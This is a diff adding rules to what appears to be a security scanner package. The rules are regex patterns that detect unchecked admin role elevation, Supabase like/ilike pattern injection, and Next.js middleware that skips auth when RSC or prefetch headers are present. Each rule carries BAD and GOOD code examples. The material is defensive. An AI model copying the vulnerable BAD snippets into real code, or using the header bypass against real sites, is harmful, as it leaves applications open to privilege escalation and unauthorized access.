+        name: "Admin Role Elevation Without Authorization Check",
+        severity: "critical",
+        owasp: "A01:2025 Broken Access Control",
+        description: "Code sets a user's role to 'admin' without verifying that the caller is already an admin. Any authenticated user could escalate their own privileges.",
+        pattern: /(?:\.update\s*\([\s\S]{0,200}?(?:role|is_?admin|permission)\s*[:=]\s*["'](?:admin|superadmin|owner)["']|\.update\s*\([\s\S]{0,200}?(?:isAdmin|is_admin)\s*[:=]\s*true)/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Always verify the caller has admin privileges before allowing role elevation.",
+        fixCode: '// GOOD: verify caller is admin first\nexport async function setRole(targetUserId: string, newRole: string) {\n  const { userId } = await auth();\n  const caller = await db.user.findUnique({ where: { id: userId } });\n  if (caller.role !== "admin") throw new Error("Forbidden");\n  await db.user.update({ where: { id: targetUserId }, data: { role: newRole } });\n}',
+        compliance: ["SOC2:CC6.6", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG1009",
+        name: "Supabase ilike/like Pattern Injection",
+        severity: "high",
+        owasp: "A03:2025 Injection",
+        description: "User input is interpolated into a Supabase .ilike() or .like() pattern via template literal or concatenation. Special characters (%, _, \\) in the input can modify the pattern, and PostgREST filter syntax characters can break the filter entirely.",
+        pattern: /\.(?:ilike|like)\s*\(\s*["'][^"']+["']\s*,\s*(?:`[^`]*\$\{|["'][^"']*["']\s*\+\s*(?!\s*["']))/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Escape special pattern characters (%, _, \\) in user input before using in ilike/like filters.",
+        fixCode: '// BAD: pattern injection\n.ilike("name", `%${query}%`)\n\n// GOOD: escape special characters\nfunction escapeLike(s: string) {\n  return s.replace(/[%_\\\\]/g, "\\\\$&");\n}\n.ilike("name", `%${escapeLike(query)}%`)',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.1"],
+    },
 ];

package/build/data/rules/nextjs.js

@@ -204,4 +204,17 @@ export const nextjsRules = [
         fixCode: '"use cache";\nimport { cacheLife, cacheTag } from "next/cache";\n\nasync function getCachedData() {\n  cacheLife("hours");\n  cacheTag("data-feed");\n  return db.posts.findMany();\n}\n\n// Revalidate when data changes:\nimport { revalidateTag } from "next/cache";\nrevalidateTag("data-feed");',
         compliance: ["SOC2:CC7.1"],
     },
+    // ── RSC Header Middleware Bypass ─────────────────────────────────
+    {
+        id: "VG417",
+        name: "Next.js RSC/Prefetch Header Bypasses Middleware Auth",
+        severity: "high",
+        owasp: "A01:2025 Broken Access Control",
+        description: "Middleware skips auth checks when RSC: 1 or Next-Router-Prefetch header is present. Attackers can add these headers to any request to bypass authentication on protected routes.",
+        pattern: /(?:headers\.get\s*\(\s*["'](?:RSC|Next-Router-Prefetch|Next-Url)["']\s*\))[\s\S]{0,100}?(?:NextResponse\.next|return\s+NextResponse\.next|continue|return)/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Never skip auth checks based on RSC or prefetch headers. These headers are user-controllable and cannot be trusted for security decisions.",
+        fixCode: '// BAD: attackers can add RSC header to skip auth\nif (request.headers.get("RSC") === "1") {\n  return NextResponse.next(); // Auth bypassed!\n}\n\n// GOOD: always enforce auth regardless of headers\nconst { userId } = await auth();\nif (!userId && isProtectedRoute(pathname)) {\n  return NextResponse.redirect(new URL("/login", request.url));\n}',
+        compliance: ["SOC2:CC6.6"],
+    },
 ];